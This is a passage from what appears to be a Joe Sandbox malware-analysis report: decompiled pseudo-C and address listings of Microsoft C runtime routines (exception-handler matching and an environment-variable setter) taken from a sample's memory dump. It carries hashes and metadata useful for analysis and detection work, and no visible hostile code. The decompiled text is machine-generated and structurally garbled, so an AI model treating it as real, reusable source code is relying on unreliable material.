                                                																_t332 = _t332 + 0xc;
                                                																__eflags = _v104 - _t250;
                                                																if(_v104 <= _t250) {
                                                																	__eflags = _t250 - _v100;
                                                																	if(_t250 <= _v100) {
                                                																		_t294 = 0;
                                                																		_v20 = 0;
                                                																		__eflags = _v92;
                                                																		if(_v92 != 0) {
                                                																			_t299 = _t270[0x1c];
                                                																			_t251 =  *((intOrPtr*)(_t299 + 0xc));
                                                																			_t252 = _t251 + 4;
                                                																			__eflags = _t252;
                                                																			_v36 = _t252;
                                                																			_t253 = _v88;
                                                																			_v40 =  *_t251;
                                                																			_v24 = _t253;
                                                																			do {
                                                																				asm("movsd");
                                                																				asm("movsd");
                                                																				asm("movsd");
                                                																				asm("movsd");
                                                																				_t327 = _v40;
                                                																				_t314 = _v36;
                                                																				__eflags = _t327;
                                                																				if(_t327 <= 0) {
                                                																					goto L40;
                                                																				} else {
                                                																					while(1) {
                                                																						_push(_t299);
                                                																						_push( *_t314);
                                                																						_t254 =  &_v84;
                                                																						_push(_t254);
                                                																						L87();
                                                																						_t332 = _t332 + 0xc;
                                                																						__eflags = _t254;
                                                																						if(_t254 != 0) {
                                                																							break;
                                                																						}
                                                																						_t299 = _t270[0x1c];
                                                																						_t327 = _t327 - 1;
                                                																						_t314 = _t314 + 4;
                                                																						__eflags = _t327;
                                                																						if(_t327 > 0) {
                                                																							continue;
                                                																						} else {
                                                																							_t294 = _v20;
                                                																							_t253 = _v24;
                                                																							goto L40;
                                                																						}
                                                																						goto L43;
                                                																					}
                                                																					_push(_a24);
                                                																					_push(_v28);
                                                																					E00C1A8B8(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
                                                																					_t332 = _t332 + 0x30;
                                                																				}
                                                																				L43:
                                                																				_t296 = _v16;
                                                																				goto L44;
                                                																				L40:
                                                																				_t294 = _t294 + 1;
                                                																				_t253 = _t253 + 0x10;
                                                																				_v20 = _t294;
                                                																				_v24 = _t253;
                                                																				__eflags = _t294 - _v92;
                                                																			} while (_t294 != _v92);
                                                																			goto L43;
                                                																		}
                                                																	}
                                                																}
                                                																L44:
                                                																_t296 = _t296 + 1;
                                                																_t247 = _v44;
                                                																_t290 = _v32 + 0x14;
                                                																_v16 = _t296;
                                                																_v32 = _t290;
                                                																__eflags = _t296 - _v56;
                                                															} while (_t296 < _v56);
                                                															_t301 = _a20;
                                                															_t315 = _a32;
                                                														}
                                                													}
                                                													__eflags = _a24;
                                                													if(__eflags != 0) {
                                                														_push(1);
                                                														E00C189E8(_t270, _t301, _t315, __eflags);
                                                														_t275 = _t270;
                                                													}
                                                													__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
                                                													if(( *_t301 & 0x1fffffff) < 0x19930521) {
                                                														L60:
                                                														_t224 = E00C1A5BC(_t270, _t275, _t296, _t301, _t315);
                                                														__eflags =  *(_t224 + 0x1c);
                                                														if( *(_t224 + 0x1c) != 0) {
                                                															goto L67;
                                                														} else {
                                                															goto L61;
                                                														}
                                                													} else {
                                                														_t228 = _t301[8] >> 2;
                                                														__eflags = _t301[7];
                                                														if(_t301[7] != 0) {
                                                															__eflags = _t228 & 0x00000001;
                                                															if((_t228 & 0x00000001) == 0) {
                                                																_push(_t301[7]);
                                                																_t229 = E00C1B34D(_t270, _t301, _t315, _t270);
                                                																_pop(_t275);
                                                																__eflags = _t229;
                                                																if(_t229 == 0) {
                                                																	goto L64;
                                                																} else {
                                                																	goto L60;
                                                																}
                                                															} else {
                                                																goto L54;
                                                															}
                                                														} else {
                                                															__eflags = _t228 & 0x00000001;
                                                															if((_t228 & 0x00000001) == 0) {
                                                																goto L60;
                                                															} else {
                                                																__eflags = _a28;
                                                																if(_a28 != 0) {
                                                																	goto L60;
                                                																} else {
                                                																	L54:
                                                																	 *(E00C1A5BC(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
                                                																	_t237 = E00C1A5BC(_t270, _t275, _t296, _t301, _t315);
                                                																	_t286 = _v8;
                                                																	 *((intOrPtr*)(_t237 + 0x14)) = _v8;
                                                																	goto L62;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												} else {
                                                													__eflags = _t270[0x14] - 0x19930521;
                                                													if(_t270[0x14] == 0x19930521) {
                                                														goto L29;
                                                													} else {
                                                														__eflags = _t270[0x14] - 0x19930522;
                                                														if(_t270[0x14] != 0x19930522) {
                                                															goto L57;
                                                														} else {
                                                															goto L29;
                                                														}
                                                													}
                                                												}
                                                											}
                                                										}
                                                									} else {
                                                										_v16 =  *((intOrPtr*)(E00C1A5BC(_t270, _t275, _t296, _t301, _t315) + 0x1c));
                                                										_t264 = E00C1A5BC(_t270, _t275, _t296, _t301, _t315);
                                                										_push(_v16);
                                                										 *(_t264 + 0x1c) = _t315;
                                                										_t265 = E00C1B34D(_t270, _t301, _t315, _t270);
                                                										_pop(_t286);
                                                										if(_t265 != 0) {
                                                											goto L23;
                                                										} else {
                                                											_t301 = _v16;
                                                											_t353 =  *_t301 - _t315;
                                                											if( *_t301 <= _t315) {
                                                												L62:
                                                												E00C22DED(_t270, _t286, _t296, _t301, _t315, __eflags);
                                                											} else {
                                                												while(1) {
                                                													_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
                                                													if(E00C1AFD6( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0xc98648) != 0) {
                                                														goto L63;
                                                													}
                                                													_t315 = _t315 + 0x10;
                                                													_t269 = _v20 + 1;
                                                													_v20 = _t269;
                                                													_t353 = _t269 -  *_t301;
                                                													if(_t269 >=  *_t301) {
                                                														goto L62;
                                                													} else {
                                                														continue;
                                                													}
                                                													goto L63;
                                                												}
                                                											}
                                                											L63:
                                                											_push(1);
                                                											_push(_t270);
                                                											E00C189E8(_t270, _t301, _t315, __eflags);
                                                											_t275 =  &_v64;
                                                											E00C1AFBE( &_v64);
                                                											E00C18030( &_v64, 0xc40b14);
                                                											L64:
                                                											 *(E00C1A5BC(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
                                                											_t231 = E00C1A5BC(_t270, _t275, _t296, _t301, _t315);
                                                											_t275 = _v8;
                                                											 *(_t231 + 0x14) = _v8;
                                                											__eflags = _t315;
                                                											if(_t315 == 0) {
                                                												_t315 = _a8;
                                                											}
                                                											E00C1828F(_t275, _t315, _t270);
                                                											E00C1B24D(_a8, _a16, _t301);
                                                											_t234 = E00C1B40A(_t301);
                                                											_t332 = _t332 + 0x10;
                                                											_push(_t234);
                                                											E00C1B1C4(_t270, _t275, _t296, _t301, _t315, __eflags);
                                                											goto L67;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}






















































































                                                0x00c1a938
                                                0x00c1a93f
                                                0x00c1a941
                                                0x00c1a94a
                                                0x00c1a950
                                                0x00c1a958
                                                0x00c1a95a
                                                0x00c1a95d
                                                0x00c1a963
                                                0x00c1acd7
                                                0x00c1acd7
                                                0x00c1acdc
                                                0x00c1acde
                                                0x00c1ace0
                                                0x00c1ace3
                                                0x00c1ace4
                                                0x00c1ace7
                                                0x00c1aced
                                                0x00c1ae0c
                                                0x00c1acf3
                                                0x00c1acf5
                                                0x00c1acfc
                                                0x00c1acff
                                                0x00c1ad02
                                                0x00c1ad08
                                                0x00c1ad0a
                                                0x00c1ad0f
                                                0x00c1ad12
                                                0x00c1ad14
                                                0x00c1ad1a
                                                0x00c1ad1c
                                                0x00c1ad22
                                                0x00c1ad37
                                                0x00c1ad3c
                                                0x00c1ad3f
                                                0x00c1ad41
                                                0x00c1ae08
                                                0x00000000
                                                0x00c1ae09
                                                0x00c1ad41
                                                0x00c1ad22
                                                0x00c1ad1a
                                                0x00c1ad12
                                                0x00c1ad47
                                                0x00c1ad4a
                                                0x00c1ad4d
                                                0x00c1ad50
                                                0x00c1ad53
                                                0x00c1ad59
                                                0x00c1ad6b
                                                0x00c1ad70
                                                0x00c1ad73
                                                0x00c1ad76
                                                0x00c1ad79
                                                0x00c1ad7c
                                                0x00c1ad7f
                                                0x00c1ad82
                                                0x00000000
                                                0x00000000
                                                0x00c1ad88
                                                0x00c1ad88
                                                0x00c1ad8b
                                                0x00c1ad8e
                                                0x00c1ad9d
                                                0x00c1ad9e
                                                0x00c1ad9e
                                                0x00c1ada0
                                                0x00c1ada3
                                                0x00000000
                                                0x00000000
                                                0x00c1ada5
                                                0x00c1ada8
                                                0x00000000
                                                0x00000000
                                                0x00c1adb6
                                                0x00c1adb8
                                                0x00c1adbb
                                                0x00c1adbd
                                                0x00c1adc5
                                                0x00c1adc5
                                                0x00c1adc8
                                                0x00c1adca
                                                0x00c1adcc
                                                0x00c1ade8
                                                0x00c1aded
                                                0x00c1adf0
                                                0x00c1adf0
                                                0x00000000
                                                0x00c1adc8
                                                0x00c1adbf
                                                0x00c1adc3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c1adf3
                                                0x00c1adf6
                                                0x00c1adf7
                                                0x00c1adfa
                                                0x00c1adfd
                                                0x00c1ae00
                                                0x00c1ae03
                                                0x00c1ae03
                                                0x00000000
                                                0x00c1ad8e
                                                0x00c1ae0d
                                                0x00c1ae12
                                                0x00c1ae13
                                                0x00c1ae16
                                                0x00c1ae19
                                                0x00c1ae1a
                                                0x00c1ae1b
                                                0x00c1ae1c
                                                0x00c1ae1f
                                                0x00c1ae21
                                                0x00c1ae99
                                                0x00c1ae9b
                                                0x00c1ae9b
                                                0x00c1ae23
                                                0x00c1ae23
                                                0x00c1ae26
                                                0x00c1ae29
                                                0x00000000
                                                0x00c1ae2b
                                                0x00c1ae2b
                                                0x00c1ae2e
                                                0x00c1ae31
                                                0x00c1ae38
                                                0x00c1ae38
                                                0x00c1ae3b
                                                0x00c1ae3d
                                                0x00c1ae3f
                                                0x00c1ae71
                                                0x00c1ae71
                                                0x00c1ae74
                                                0x00c1ae7b
                                                0x00c1ae7b
                                                0x00c1ae7e
                                                0x00c1ae81
                                                0x00c1ae88
                                                0x00c1ae88
                                                0x00c1ae8b
                                                0x00c1ae92
                                                0x00c1ae94
                                                0x00c1ae94
                                                0x00c1ae8d
                                                0x00c1ae8d
                                                0x00c1ae90
                                                0x00000000
                                                0x00000000
                                                0x00c1ae90
                                                0x00c1ae83
                                                0x00c1ae83
                                                0x00c1ae86
                                                0x00000000
                                                0x00000000
                                                0x00c1ae86
                                                0x00c1ae76
                                                0x00c1ae76
                                                0x00c1ae79
                                                0x00000000
                                                0x00000000
                                                0x00c1ae79
                                                0x00c1ae95
                                                0x00c1ae41
                                                0x00c1ae41
                                                0x00c1ae41
                                                0x00c1ae44
                                                0x00c1ae44
                                                0x00c1ae46
                                                0x00c1ae48
                                                0x00000000
                                                0x00000000
                                                0x00c1ae4a
                                                0x00c1ae4c
                                                0x00c1ae60
                                                0x00c1ae60
                                                0x00c1ae4e
                                                0x00c1ae4e
                                                0x00c1ae51
                                                0x00c1ae54
                                                0x00000000
                                                0x00c1ae56
                                                0x00c1ae56
                                                0x00c1ae59
                                                0x00c1ae5c
                                                0x00c1ae5e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c1ae5e
                                                0x00c1ae54
                                                0x00c1ae69
                                                0x00c1ae69
                                                0x00c1ae6b
                                                0x00000000
                                                0x00c1ae6d
                                                0x00c1ae6d
                                                0x00c1ae6d
                                                0x00000000
                                                0x00c1ae6b
                                                0x00c1ae64
                                                0x00c1ae66
                                                0x00c1ae66
                                                0x00000000
                                                0x00c1ae66
                                                0x00c1ae33
                                                0x00c1ae33
                                                0x00c1ae36
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c1ae36
                                                0x00c1ae31
                                                0x00c1ae29
                                                0x00c1ae9c
                                                0x00c1aea0
                                                0x00c1aea0
                                                0x00c1a972
                                                0x00c1a972
                                                0x00c1a97b
                                                0x00c1aa78
                                                0x00c1aa78
                                                0x00c1aa7b
                                                0x00000000
                                                0x00c1a9aa
                                                0x00c1a9aa
                                                0x00c1a9af
                                                0x00000000
                                                0x00c1a9b5
                                                0x00c1a9b5
                                                0x00c1a9bd
                                                0x00c1ac71
                                                0x00c1ac75
                                                0x00c1a9c3
                                                0x00c1a9c8
                                                0x00c1a9cb
                                                0x00c1a9d0
                                                0x00c1a9d7
                                                0x00c1a9dc
                                                0x00000000
                                                0x00c1aa14
                                                0x00c1aa1c
                                                0x00c1aa80
                                                0x00c1aa80
                                                0x00c1aa83
                                                0x00c1aa86
                                                0x00c1aa88
                                                0x00c1aa8b
                                                0x00c1aa8e
                                                0x00c1aa94
                                                0x00c1ac40
                                                0x00c1ac40
                                                0x00c1ac43
                                                0x00000000
                                                0x00c1ac45
                                                0x00c1ac45
                                                0x00c1ac48
                                                0x00000000
                                                0x00c1ac4e
                                                0x00c1ac4e
                                                0x00c1ac51
                                                0x00c1ac54
                                                0x00c1ac55
                                                0x00c1ac56
                                                0x00c1ac59
                                                0x00c1ac5a
                                                0x00c1ac5d
                                                0x00c1ac5e
                                                0x00c1ac63
                                                0x00000000
                                                0x00c1ac63
                                                0x00c1ac48
                                                0x00c1aa9a
                                                0x00c1aa9a
                                                0x00c1aa9e
                                                0x00000000
                                                0x00c1aaa4
                                                0x00c1aaa4
                                                0x00c1aaab
                                                0x00c1aac3
                                                0x00c1aac3
                                                0x00c1aac6
                                                0x00c1aac9
                                                0x00c1aacf
                                                0x00c1aadf
                                                0x00c1aae4
                                                0x00c1aae7
                                                0x00c1aaea
                                                0x00c1aaed
                                                0x00c1aaf0
                                                0x00c1aaf3
                                                0x00c1aaf6
                                                0x00c1aafc
                                                0x00c1aafc
                                                0x00c1aaff
                                                0x00c1ab02
                                                0x00c1ab11
                                                0x00c1ab12
                                                0x00c1ab12
                                                0x00c1ab14
                                                0x00c1ab17
                                                0x00c1ab1d
                                                0x00c1ab20
                                                0x00c1ab26
                                                0x00c1ab28
                                                0x00c1ab2b
                                                0x00c1ab2e
                                                0x00c1ab34
                                                0x00c1ab37
                                                0x00c1ab3c
                                                0x00c1ab3c
                                                0x00c1ab3f
                                                0x00c1ab42
                                                0x00c1ab45
                                                0x00c1ab48
                                                0x00c1ab4b
                                                0x00c1ab50
                                                0x00c1ab51
                                                0x00c1ab52
                                                0x00c1ab53
                                                0x00c1ab54
                                                0x00c1ab57
                                                0x00c1ab5a
                                                0x00c1ab5c
                                                0x00000000
                                                0x00c1ab5e
                                                0x00c1ab5e
                                                0x00c1ab5e
                                                0x00c1ab5f
                                                0x00c1ab61
                                                0x00c1ab64
                                                0x00c1ab65
                                                0x00c1ab6a
                                                0x00c1ab6d
                                                0x00c1ab6f
                                                0x00000000
                                                0x00000000
                                                0x00c1ab71
                                                0x00c1ab74
                                                0x00c1ab75
                                                0x00c1ab78
                                                0x00c1ab7a
                                                0x00000000
                                                0x00c1ab7c
                                                0x00c1ab7c
                                                0x00c1ab7f
                                                0x00000000
                                                0x00c1ab7f
                                                0x00000000
                                                0x00c1ab7a
                                                0x00c1ab93
                                                0x00c1ab99
                                                0x00c1abb6
                                                0x00c1abbb
                                                0x00c1abbb
                                                0x00c1abbe
                                                0x00c1abbe
                                                0x00000000
                                                0x00c1ab82
                                                0x00c1ab82
                                                0x00c1ab83
                                                0x00c1ab86
                                                0x00c1ab89
                                                0x00c1ab8c
                                                0x00c1ab8c
                                                0x00000000
                                                0x00c1ab91
                                                0x00c1ab2e
                                                0x00c1ab20
                                                0x00c1abc1
                                                0x00c1abc4
                                                0x00c1abc5
                                                0x00c1abc8
                                                0x00c1abcb
                                                0x00c1abce
                                                0x00c1abd1
                                                0x00c1abd1
                                                0x00c1abda
                                                0x00c1abdd
                                                0x00c1abdd
                                                0x00c1aaf6
                                                0x00c1abe0
                                                0x00c1abe4
                                                0x00c1abe6
                                                0x00c1abe9
                                                0x00c1abef
                                                0x00c1abef
                                                0x00c1abf7
                                                0x00c1abfc
                                                0x00c1ac66
                                                0x00c1ac66
                                                0x00c1ac6b
                                                0x00c1ac6f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c1abfe
                                                0x00c1ac01
                                                0x00c1ac04
                                                0x00c1ac08
                                                0x00c1ac16
                                                0x00c1ac18
                                                0x00c1ac2f
                                                0x00c1ac33
                                                0x00c1ac39
                                                0x00c1ac3a
                                                0x00c1ac3c
                                                0x00000000
                                                0x00c1ac3e
                                                0x00000000
                                                0x00c1ac3e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c1ac0a
                                                0x00c1ac0a
                                                0x00c1ac0c
                                                0x00000000
                                                0x00c1ac0e
                                                0x00c1ac0e
                                                0x00c1ac12
                                                0x00000000
                                                0x00c1ac14
                                                0x00c1ac1a
                                                0x00c1ac1f
                                                0x00c1ac22
                                                0x00c1ac27
                                                0x00c1ac2a
                                                0x00000000
                                                0x00c1ac2a
                                                0x00c1ac12
                                                0x00c1ac0c
                                                0x00c1ac08
                                                0x00c1aaad
                                                0x00c1aaad
                                                0x00c1aab4
                                                0x00000000
                                                0x00c1aab6
                                                0x00c1aab6
                                                0x00c1aabd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c1aabd
                                                0x00c1aab4
                                                0x00c1aaab
                                                0x00c1aa9e
                                                0x00c1aa1e
                                                0x00c1aa26
                                                0x00c1aa29
                                                0x00c1aa2e
                                                0x00c1aa32
                                                0x00c1aa35
                                                0x00c1aa3b
                                                0x00c1aa3e
                                                0x00000000
                                                0x00c1aa40
                                                0x00c1aa40
                                                0x00c1aa43
                                                0x00c1aa45
                                                0x00c1ac76
                                                0x00c1ac76
                                                0x00000000
                                                0x00c1aa4b
                                                0x00c1aa53
                                                0x00c1aa5e
                                                0x00000000
                                                0x00000000
                                                0x00c1aa67
                                                0x00c1aa6a
                                                0x00c1aa6b
                                                0x00c1aa6e
                                                0x00c1aa70
                                                0x00000000
                                                0x00c1aa76
                                                0x00000000
                                                0x00c1aa76
                                                0x00000000
                                                0x00c1aa70
                                                0x00c1aa4b
                                                0x00c1ac7b
                                                0x00c1ac7b
                                                0x00c1ac7d
                                                0x00c1ac7e
                                                0x00c1ac85
                                                0x00c1ac88
                                                0x00c1ac96
                                                0x00c1ac9b
                                                0x00c1aca0
                                                0x00c1aca3
                                                0x00c1aca8
                                                0x00c1acab
                                                0x00c1acae
                                                0x00c1acb0
                                                0x00c1acb2
                                                0x00c1acb2
                                                0x00c1acb7
                                                0x00c1acc3
                                                0x00c1acc9
                                                0x00c1acce
                                                0x00c1acd1
                                                0x00c1acd2
                                                0x00000000
                                                0x00c1acd2
                                                0x00c1aa3e
                                                0x00c1aa1c
                                                0x00c1a9dc
                                                0x00c1a9bd
                                                0x00c1a9af
                                                0x00c1a97b

                                                APIs
                                                • type_info::operator==.LIBVCRUNTIME ref: 00C1AA57
                                                • ___TypeMatch.LIBVCRUNTIME ref: 00C1AB65
                                                • _UnwindNestedFrames.LIBCMT ref: 00C1ACB7
                                                • CallUnexpected.LIBVCRUNTIME ref: 00C1ACD2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                • String ID: csm$csm$csm
                                                • API String ID: 2751267872-393685449
                                                • Opcode ID: 992b33f3e816a8e50a10e112f3c8451b2e5098325032f93bd397a66dc3fda9fc
                                                • Instruction ID: 9d917b0225563f99a410e60b1856477c6dea75face39e0d91d6bdc015592b532
                                                • Opcode Fuzzy Hash: 992b33f3e816a8e50a10e112f3c8451b2e5098325032f93bd397a66dc3fda9fc
                                                • Instruction Fuzzy Hash: 27B16B71802209EFCF19DFA4C9819EEB7B6BF06310B144159E8216B212D731DA91FF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E00C2B052(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                				signed int _v5;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v48;
                                                				signed int _t59;
                                                				signed int _t62;
                                                				signed int _t64;
                                                				signed int _t67;
                                                				signed int _t68;
                                                				signed int _t71;
                                                				signed int _t72;
                                                				signed int _t76;
                                                				signed int* _t78;
                                                				signed int _t84;
                                                				signed int _t86;
                                                				signed int _t87;
                                                				signed int _t91;
                                                				intOrPtr* _t98;
                                                				signed int _t109;
                                                				signed int _t110;
                                                				signed int _t111;
                                                				intOrPtr* _t120;
                                                				signed int _t121;
                                                				void* _t122;
                                                				void* _t126;
                                                				signed int _t130;
                                                				signed int _t138;
                                                				signed int _t139;
                                                				signed int _t141;
                                                				signed int _t143;
                                                				signed int _t146;
                                                				signed int _t149;
                                                				signed int _t150;
                                                				void* _t153;
                                                				void* _t157;
                                                				void* _t158;
                                                				void* _t160;
                                                				void* _t162;
                                                
                                                				_t110 = __ebx;
                                                				_t153 = _t157;
                                                				_t158 = _t157 - 0x10;
                                                				_t146 = _a4;
                                                				_t163 = _t146;
                                                				if(_t146 != 0) {
                                                					_push(__ebx);
                                                					_t141 = _t146;
                                                					_t59 = E00C32CB0(_t146, 0x3d);
                                                					_v20 = _t59;
                                                					__eflags = _t59;
                                                					if(__eflags == 0) {
                                                						L38:
                                                						 *((intOrPtr*)(E00C1DA28(__eflags))) = 0x16;
                                                						goto L39;
                                                					} else {
                                                						__eflags = _t59 - _t146;
                                                						if(__eflags == 0) {
                                                							goto L38;
                                                						} else {
                                                							_v5 =  *((intOrPtr*)(_t59 + 1));
                                                							L60();
                                                							_t110 = 0;
                                                							__eflags =  *0xc993d8 - _t110; // 0x166e6b8
                                                							if(__eflags != 0) {
                                                								L14:
                                                								_t64 =  *0xc993d8; // 0x166e6b8
                                                								_v12 = _t64;
                                                								__eflags = _t64;
                                                								if(_t64 == 0) {
                                                									goto L39;
                                                								} else {
                                                									_t67 = E00C2B35A(_t146, _v20 - _t146);
                                                									_v16 = _t67;
                                                									_t120 = _v12;
                                                									__eflags = _t67;
                                                									if(_t67 < 0) {
                                                										L24:
                                                										__eflags = _v5 - _t110;
                                                										if(_v5 == _t110) {
                                                											goto L40;
                                                										} else {
                                                											_t68 =  ~_t67;
                                                											_v16 = _t68;
                                                											_t30 = _t68 + 2; // 0x2
                                                											_t139 = _t30;
                                                											__eflags = _t139 - _t68;
                                                											if(_t139 < _t68) {
                                                												goto L39;
                                                											} else {
                                                												__eflags = _t139 - 0x3fffffff;
                                                												if(_t139 >= 0x3fffffff) {
                                                													goto L39;
                                                												} else {
                                                													_v12 = E00C2D953(_t120, _t139, 4);
                                                													E00C22F9F(_t110);
                                                													_t71 = _v12;
                                                													_t158 = _t158 + 0x10;
                                                													__eflags = _t71;
                                                													if(_t71 == 0) {
                                                														goto L39;
                                                													} else {
                                                														_t121 = _v16;
                                                														_t141 = _t110;
                                                														 *(_t71 + _t121 * 4) = _t146;
                                                														 *(_t71 + 4 + _t121 * 4) = _t110;
                                                														goto L29;
                                                													}
                                                												}
                                                											}
                                                										}
                                                									} else {
                                                										__eflags =  *_t120 - _t110;
                                                										if( *_t120 == _t110) {
                                                											goto L24;
                                                										} else {
                                                											E00C22F9F( *((intOrPtr*)(_t120 + _t67 * 4)));
                                                											_t138 = _v16;
                                                											__eflags = _v5 - _t110;
                                                											if(_v5 != _t110) {
                                                												_t141 = _t110;
                                                												 *(_v12 + _t138 * 4) = _t146;
                                                											} else {
                                                												_t139 = _v12;
                                                												while(1) {
                                                													__eflags =  *((intOrPtr*)(_t139 + _t138 * 4)) - _t110;
                                                													if( *((intOrPtr*)(_t139 + _t138 * 4)) == _t110) {
                                                														break;
                                                													}
                                                													 *((intOrPtr*)(_t139 + _t138 * 4)) =  *((intOrPtr*)(_t139 + 4 + _t138 * 4));
                                                													_t138 = _t138 + 1;
                                                													__eflags = _t138;
                                                												}
                                                												_v16 = E00C2D953(_t139, _t138, 4);
                                                												E00C22F9F(_t110);
                                                												_t71 = _v16;
                                                												_t158 = _t158 + 0x10;
                                                												__eflags = _t71;
                                                												if(_t71 != 0) {
                                                													L29:
                                                													 *0xc993d8 = _t71;
                                                												}
                                                											}
                                                											__eflags = _a8 - _t110;
                                                											if(_a8 == _t110) {
                                                												goto L40;
                                                											} else {
                                                												_t122 = _t146 + 1;
                                                												do {
                                                													_t72 =  *_t146;
                                                													_t146 = _t146 + 1;
                                                													__eflags = _t72;
                                                												} while (_t72 != 0);
                                                												_v16 = _t146 - _t122 + 2;
                                                												_t149 = E00C22F42(_t146 - _t122 + 2, 1);
                                                												_pop(_t124);
                                                												__eflags = _t149;
                                                												if(_t149 == 0) {
                                                													L37:
                                                													E00C22F9F(_t149);
                                                													goto L40;
                                                												} else {
                                                													_t76 = E00C22E29(_t149, _v16, _a4);
                                                													_t160 = _t158 + 0xc;
                                                													__eflags = _t76;
                                                													if(__eflags != 0) {
                                                														_push(_t110);
                                                														_push(_t110);
                                                														_push(_t110);
                                                														_push(_t110);
                                                														_push(_t110);
                                                														E00C1D97B();
                                                														asm("int3");
                                                														_push(_t153);
                                                														_push(_t141);
                                                														_t143 = _v48;
                                                														__eflags = _t143;
                                                														if(_t143 != 0) {
                                                															_t126 = 0;
                                                															_t78 = _t143;
                                                															__eflags =  *_t143;
                                                															if( *_t143 != 0) {
                                                																do {
                                                																	_t78 =  &(_t78[1]);
                                                																	_t126 = _t126 + 1;
                                                																	__eflags =  *_t78;
                                                																} while ( *_t78 != 0);
                                                															}
                                                															_t51 = _t126 + 1; // 0x2
                                                															_t150 = E00C22F42(_t51, 4);
                                                															_t128 = _t149;
                                                															__eflags = _t150;
                                                															if(_t150 == 0) {
                                                																L58:
                                                																E00C200C9(_t110, _t128, _t139, _t143, _t150);
                                                																goto L59;
                                                															} else {
                                                																_t130 =  *_t143;
                                                																__eflags = _t130;
                                                																if(_t130 == 0) {
                                                																	L57:
                                                																	E00C22F9F(0);
                                                																	_t86 = _t150;
                                                																	goto L45;
                                                																} else {
                                                																	_push(_t110);
                                                																	_t110 = _t150 - _t143;
                                                																	__eflags = _t110;
                                                																	do {
                                                																		_t52 = _t130 + 1; // 0x5
                                                																		_t139 = _t52;
                                                																		do {
                                                																			_t87 =  *_t130;
                                                																			_t130 = _t130 + 1;
                                                																			__eflags = _t87;
                                                																		} while (_t87 != 0);
                                                																		_t53 = _t130 - _t139 + 1; // 0x6
                                                																		_v12 = _t53;
                                                																		 *(_t110 + _t143) = E00C22F42(_t53, 1);
                                                																		E00C22F9F(0);
                                                																		_t162 = _t160 + 0xc;
                                                																		__eflags =  *(_t110 + _t143);
                                                																		if( *(_t110 + _t143) == 0) {
                                                																			goto L58;
                                                																		} else {
                                                																			_t91 = E00C22E29( *(_t110 + _t143), _v12,  *_t143);
                                                																			_t160 = _t162 + 0xc;
                                                																			__eflags = _t91;
                                                																			if(_t91 != 0) {
                                                																				L59:
                                                																				_push(0);
                                                																				_push(0);
                                                																				_push(0);
                                                																				_push(0);
                                                																				_push(0);
                                                																				E00C1D97B();
                                                																				asm("int3");
                                                																				_t84 =  *0xc993d8; // 0x166e6b8
                                                																				__eflags = _t84 -  *0xc993e4; // 0x166e6b8
                                                																				if(__eflags == 0) {
                                                																					_push(_t84);
                                                																					L43();
                                                																					 *0xc993d8 = _t84;
                                                																					return _t84;
                                                																				}
                                                																				return _t84;
                                                																			} else {
                                                																				goto L55;
                                                																			}
                                                																		}
                                                																		goto L63;
                                                																		L55:
                                                																		_t143 = _t143 + 4;
                                                																		_t130 =  *_t143;
                                                																		__eflags = _t130;
                                                																	} while (_t130 != 0);
                                                																	goto L57;
                                                																}
                                                															}
                                                														} else {
                                                															_t86 = 0;
                                                															__eflags = 0;
                                                															L45:
                                                															return _t86;
                                                														}
                                                													} else {
                                                														asm("sbb eax, eax");
                                                														 *(_v20 + 1 + _t149 - _a4 - 1) = _t110;
                                                														__eflags = E00C315B4(_v20 + 1 + _t149 - _a4, _t139, __eflags, _t149,  ~_v5 & _v20 + 0x00000001 + _t149 - _a4);
                                                														if(__eflags == 0) {
                                                															_t98 = E00C1DA28(__eflags);
                                                															_t111 = _t110 | 0xffffffff;
                                                															__eflags = _t111;
                                                															 *_t98 = 0x2a;
                                                														}
                                                														goto L37;
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                							} else {
                                                								__eflags = _a8;
                                                								if(_a8 == 0) {
                                                									L9:
                                                									__eflags = _v5 - _t110;
                                                									if(_v5 != _t110) {
                                                										 *0xc993d8 = E00C22F42(1, 4);
                                                										E00C22F9F(_t110);
                                                										_t158 = _t158 + 0xc;
                                                										__eflags =  *0xc993d8 - _t110; // 0x166e6b8
                                                										if(__eflags == 0) {
                                                											L39:
                                                											_t111 = _t110 | 0xffffffff;
                                                											__eflags = _t111;
                                                											goto L40;
                                                										} else {
                                                											__eflags =  *0xc993dc - _t110; // 0x0
                                                											if(__eflags != 0) {
